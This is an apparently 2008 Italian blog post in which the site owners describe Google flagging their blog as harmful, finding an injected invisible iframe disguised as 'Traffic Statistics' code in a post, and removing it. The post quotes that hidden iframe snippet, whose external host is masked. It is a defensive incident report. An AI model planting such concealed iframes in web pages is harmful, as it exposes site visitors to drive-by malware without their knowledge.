Attacchi hacker

Archived Posts from this Category

Questo sito potrebbe arrecare danni al tuo computer

Scritto da il 23 Feb 2008 | Archiviato in: Attacchi hacker

Anche se esula dal tema principale di questo blog, è il caso di spendere qualche riga per un ulteriore attacco hacker nei confronti di Casa Spam (ed anche di due altri miei blog personali).

A qualcuno di voi è senz’altro capitata la medesima cosa, basta fare una ricerca in rete per rendersene conto.

Se si cerca “casa spam” con Google viene restituita una pagina di risultati che non invoglia minimamente a cliccare su questo blog. Sì, perché sotto al titolo, Google ha inserito questa frase: Questo sito potrebbe arrecare danni al tuo computer.

Cliccando su quella frase si viene mandati su una pagina interna di Google che spiega: Questo messaggio di avviso viene visualizzato con i risultati di ricerca che abbiamo identificato come siti web che possono installare software dannoso sul tuo computer.

Così Pieru ha controllato il codice sorgente della home page ed ha trovato un codice sospetto all’interno di un articolo:

<!– Traffic Statistics –> <iframe width=”1″ height=”1″ frameborder=”0″ src=”http://www.*****/iframe/wp-stats.php”></iframe> <!– End Traffic Statistics –>

Codice che, ovviamente, nessuno di noi aveva inserito. E’ stato aperto l’articolo ed eliminato il codice. E’ stato quindi richiesto un controllo a Google e presto quella scritta sparirà dai risultati della ricerca.

Navigate pure tranquilli in Casa Spam, è stata fatta la dovuta disinfestazione.